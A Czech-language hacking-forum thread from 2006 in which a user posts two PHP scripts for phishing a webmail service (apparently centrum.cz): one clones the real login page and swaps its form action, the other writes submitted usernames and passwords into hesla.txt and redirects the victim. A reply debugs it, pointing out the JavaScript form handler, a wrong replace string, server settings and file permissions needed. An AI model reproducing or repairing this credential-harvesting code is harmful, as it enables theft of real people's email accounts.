phising

HackForum

phising#
tak jsem rozjel konečně ty skripty za pomoci Antiho, ale neco me nefacha, kdyz klepnu na prihlasit tak se me to normalne prihlasi do schranky a vubec se to nepřesměruj na login.php nevíte co s tím?
zde uvadim zdrojaky:
---------index.php--------
<?
$open=FOpen("[link]","r"); // otvoríme súbor na čítanie
while(!feof($open))
{
$read .= fread($open,1024);
}
FClose($open); // zatvoríme súbor
$nahradene=str_replace("[link]","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>

-------login.php.--------
<?
$file = @FOpen("hesla.txt", "a");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);

$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$name." : ".$pwd."\n");
FClose($file);
header("location: [link]");
?>

(odpovědět)
fisi9.5.2006 16:42
re: phising#
je to predelany na centrum
(odpovědět)
fisi9.5.2006 16:43
re: phising#
Protože JavaScript, navíc máš 'search' v str_replace() špatně. Prolez si kód www.centrum.cz a zjistíš, kde je chyba. Viz. tahle část:
<form method="post" action="[link]" id="em-f" onsubmit="checkBro();">

Navíc ten tvůj kód potřebuje server s podporou url_fopen a register_globals on, což není každý. A ještě musíš nastavit chmod pro soubor hesla.txt, aby do něj mohl skript zapisovat.
(odpovědět)
Ni7R09.5.2006 17:22

Zpět
 
 
 

 
BBCode